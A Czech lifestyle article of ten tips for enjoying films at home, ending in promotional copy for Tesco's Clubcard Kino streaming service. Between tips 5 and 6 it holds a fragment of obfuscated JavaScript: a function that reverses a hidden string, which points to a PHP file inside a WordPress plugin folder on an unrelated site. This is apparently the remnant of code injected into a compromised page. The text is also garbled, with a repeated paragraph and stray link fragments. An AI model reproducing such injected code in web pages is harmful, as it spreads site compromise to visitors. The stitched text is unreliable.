FACESTARŽivotní stylJE LEPŠÍ SLEDOVAT FILM V KINĚ, NEBO DOMA? 10 TIPŮ, JAK SI...

JE LEPŠÍ SLEDOVAT FILM V KINĚ, NEBO DOMA? 10 TIPŮ, JAK SI MAXIMÁLNĚ UŽÍT DOMÁCÍ FILMOVÝ ZÁŽITEK!

Naproti tomu při sledování filmů doma můžete vše zcela přizpůsobit potřebám lidí, kteří na promítání přijdou. Nemusíte vlastnit obrazovku přes celou stěnu a nejdokonalejší zvukový systém. Mnohem důležitější je zaměřit se na detaily.

Naproti tomu při sledování filmů doma můžete vše zcela přizpůsobit potřebám lidí, kteří na promítání přijdou. Nemusíte vlastnit obrazovku přes celou stěnu a nejdokonalejší zvukový systém. Mnohem důležitější je zaměřit se na detaily.

1. Místa k sezení

Každý má v kině své oblíbené místo. Přemýšlejte o obýváku jako o kinosále a uspořádejte sezení tak, aby každý mohl film pohodlně sledovat tak, jako by seděl na tom nejlepším místě v kině. Pokud je sedačka příliš daleko od obrazovky, přisuňte ji a vyzkoušejte, jak z kterého místa uvidíte na obrazovku. Pokud přijde na promítání větší množství lidí, vytvořte druhou řadu vyšší než první. První řada může být např. na matraci nebo polštářcích pod pohovkou. Druhá řada se dá také vyvýšit např. pomocí dřevěných palet.

2. Občerstvení

Zapomeňte na chvíli na to, že vaším největším přáním je mít perfektně uklizeno, a nakupte obrovské množství popcornu nebo jiných dobrot. Připravte také dostatek nápojů, nejlépe v lahvích. Každý se pak může pohodlně obsloužit a nikdo nebude vyrušovat.

andFlickr.com/I’mNotJack

3. Správná volba filmu

Vyberte takový film, který bude účastníkům vyhovovat. Pokud zvete například své rodiče, nebo film s vámi sledují mladší děti, můžou vás zaskočit náhlé erotické scény. Je lepší si o filmu předem něco přečíst, aby pak nevyvolával trapné pocity.

4. Přestávka

Rub a líc každého promítání. Účastníci se nejspíš budou cítit lépe, pokud naplánujete přestávku, aby si mohli v klidu dojít na toaletu, během přestávky také doplníte misky s občerstvením a můžete si popovídat o ději. To v kině nemáte.

5. Pohodlí

Řekněte hostům, ať si přinesou polštář a deku, pokud jich nemáte doma dostatek. Ať se každý uvelebí co nejpohodlněji.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahand Megan’s House Tour“>Graeme and Megan’s House Tour

6. Nádobí na jedno použití

Neobtěžujte se s nádobím. Velké papírové pytle na popcorn a další pochoutky, případně papírové tácky postačí. Úklid pak bude snazší a lépe si večer užijete i jako hostitel. Hlavní je přece film, ne jídlo.

7. Můžete si dopřát maraton

Večer je dlouhý a jeden film nemusí stačit. Dopřejte si klidně celou trilogii. Když se vám bude sedět pohodlně, nic vám v tom nebrání.

8. Zvuk

Jestliže chcete do něčeho investovat, investujte do zvuku. Nemusíte mít dokonalý prostorový zvuk jako v kině, stačí lepší reproduktory. Kvalitnější zvuk můžete získat za přijatelnou cenu.

9. Mobily

Jsou vaši přátelé závislí na mobilní komunikaci? Před promítáním účastníky požádejte, aby mobily vypnuli, vyberte je a vložte do velké mísy doprostřed místnosti. První, kdo si pro mobil dojde, se musí po celý večer starat o občerstvení.

10. Clubcard Kino

Tesco nabízí pro držitele věrnostní karty Clubcard novou videotéku s více než tisícovkou filmů z české i světové kinematografie. Můžete využít měsíční předplatné s 200 vybranými filmy za 99 Kč, které umožňuje neomezené sledování, nebo si vybraný film půjčit na 48 hodin za cenu od 49 Kč. Nová videotéka Clubcard Kino je dostupná pro Smart TV značek Samsung, LG, Philips a Sharp, zařízení s operačními systémy iOS, Android, Windows 8 a všechny PC. Vstup do Clubcard Kina naleznou zájemci na www.clubcard.cz/clubcardkino.

Clubcard Kino nabízí službu EST- tedy digitální nákup filmů. „Je to trend, který preferují filmová studia, díky tomu mají diváci Clubcard Kina možnost vidět filmy již 14 dní před DVD a TVOD premiérou. V předstihu tak nabídneme zákazníkům filmy dříve než kdokoliv jiný na trhu,“ dodává Erik Uxa, manažer společnosti Banaxi. Platbu za měsíční předplatné i čtyřiceti osmihodinovou zápůjčku filmu je umožněno provádět online. Vše je jednoduché a rychlé, navíc si může zákazník dobýt svůj kredit i přes sms. Diváci mají rovněž možnost využívat systém dobíjení kreditu, který se jim bude odečítat po zhlédnutí daného filmu.

Související články